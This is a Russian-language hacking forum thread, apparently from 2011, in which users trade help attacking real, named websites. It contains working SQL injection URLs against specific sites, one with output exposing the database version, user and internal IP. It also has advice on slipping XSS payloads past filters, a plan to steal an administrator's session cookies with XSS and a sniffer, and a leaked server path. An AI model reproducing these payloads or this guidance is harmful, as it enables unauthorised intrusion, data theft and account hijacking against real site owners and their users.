30.08.2011, 22:00
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Как крутить при таком случае:
Код:
http://www.textsongs.ru/search/?name=%27
Вот так!
Сообщение от None
http://www.textsongs.ru/search/?name=1%27and%281%3D0%29union%28select%281%29%2Cco ncat_ws%280x3a%2Cversion%28%29%2Cdatabase%28%29%2C user%28%29%2C%40%40version_compile_os%29%2C3%2C4%2 C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2 C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2 C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2 C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2 C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2 C56%2C57%2C58%29%23
5.0.77-log: peoplesru:alex192@192.168.0.162:redhat-linux-gnu |
|
|
31.08.2011, 00:28
|
|
Новичок
Регистрация: 27.08.2011
Сообщений: 24
С нами:
7742486
Репутация:
1
|
|
Вопрос: Чтобы угнать ак админа нужно спирить у его куки, чтобы забрать куки нужно снифер, чтобы снифер заберал куки нужно xss уязвимость, чтобы найти уязвимость нужно посетить сайт античат. Я все правельно понял? или здесь чтото нетак? И как поподробней использувать xss со снифером если можно ссилки на мануалы
|
|
|
|
31.08.2011, 02:34
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
2~{OmRus}~
/thread20140.html
|
|
|
|
01.09.2011, 20:21
|
|
Познающий
Регистрация: 03.05.2011
Сообщений: 30
С нами:
7909526
Репутация:
1
|
|
http://finclub.perm.ru/?show=561064292&news_id=-815805698+union+select+1,2,user(),4,version(),6,7, 8 не могу подобрать таблицы. 4 ветка.
|
|
|
|
01.09.2011, 21:59
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
Сообщение от None
http://kostomuksha-city.ru/test/ebanucca.php
это mod_rewrite? как получить путь до .php файла, выдающего phpinfo()?
|
|
|
|
01.09.2011, 22:12
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от vaddd
это mod_rewrite? как получить путь до .php файла, выдающего phpinfo()?
SCRIPT_FILENAME /pub/home/***/new/htdocs/test.php
|
|
|
|
01.09.2011, 23:35
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
на сайте имеется XSS
проходят подставки типа hack и пр.
а
alert('hack') не канает, как дальше двигать подскажите
|
|
|
|
01.09.2011, 23:51
|
|
Новичок
Регистрация: 16.05.2009
Сообщений: 12
С нами:
8940726
Репутация:
2
|
|
Сообщение от foozzi
на сайте имеется XSS
проходят подставки типа hack и пр.
а
alert('hack') не канает, как дальше двигать подскажите
Смотри что как фильтруется, поиграй символами, я пару раз видел фильтры, которые вырезают , спасало что-то типа ipt>
/thread20140.html советую к ознакомлению
|
|
|
|
02.09.2011, 02:00
|
|
Новичок
Регистрация: 26.08.2011
Сообщений: 2
С нами:
7743926
Репутация:
0
|
|
podskajite plz vozmojno li sdelat CREATE TABLE cherez: =-1+union+select+1,2,3,(create table test ( tst INT)),5,6+--+
ili kak voobshe delat create table cherez injekciu, zaranee spasibo
|
|
|
|
02.09.2011, 12:29
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Сообщение от gh0stface
podskajite plz vozmojno li sdelat CREATE TABLE cherez: =-1+union+select+1,2,3,(create table test ( tst INT)),5,6+--+
ili kak voobshe delat create table cherez injekciu, zaranee spasibo
Через инъекцию в MySQL - нельзя! Можно только в MSSQL инъекции.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
